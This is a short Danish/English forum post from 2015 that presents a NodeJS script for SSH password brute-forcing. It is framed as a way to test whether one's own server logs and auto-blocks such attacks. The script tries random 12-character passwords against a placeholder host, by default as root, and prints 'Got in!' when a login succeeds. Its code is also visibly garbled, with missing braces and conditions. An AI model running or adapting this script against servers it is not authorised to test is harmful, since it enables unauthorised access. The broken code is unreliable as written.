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Simpel Bruteforce test
28-03-2015, 02:11 (Denne besked var sidst ændret: 28-03-2015, 02:11 af Rubas.)
Simpel Bruteforce test
Brug denne simpel test til at se om din server tager forhold til bruteforcing.
Scriptet kræver NodeJS, og bibliotek: simple-ssh og randomstring, som kan installeres via npm install simple-ssh og npm install randomstring

Use this test for seeing the important logs of bruteforce attacks in /var/log/auth.log .
Please use this on own risk!! If your linux box got the security, you might get banned from your own linux box.

Use this as a tester for auto-blocking robots that are trying to bruteforcing into your SSH.

libraries used: simple-ssh and randomstring.

var SSH = require('simple-ssh');
var randomstring = require("randomstring");

var triedOut = [];
var theRandomVariable;

var arrayContains = function(pRandomString){
    var i = triedOut.length;
    while (i--) {
       if (triedOut[i] === pRandomString) {
           return true;
    return false;

var getRandomPassword = function(){
    theRandomVariable = randomstring.generate(12);
        console.log("Exists in array " + theRandomVariable);
    } else {
        return randomstring.generate(12);

var startSSH = function(){
    var aRandomPassword = getRandomPassword();
    var ssh = new SSH({
        host: '<< HOST IP >>',
        port: '<< HOST PORT / DEFAULT 22 >>',
        user: '<< HOST USER / DEFAULT ROOT >>',
        pass: aRandomPassword,

    ssh.exec("ls", {
         out: function(stdout) {
            console.log("Got in! Used password: " + aRandomPassword);

    ssh.on('error', function(err) {
        console.log('Did not get in.');
        console.log('Tried out: ' + aRandomPassword);

        if(aRandomPassword !== undefined){




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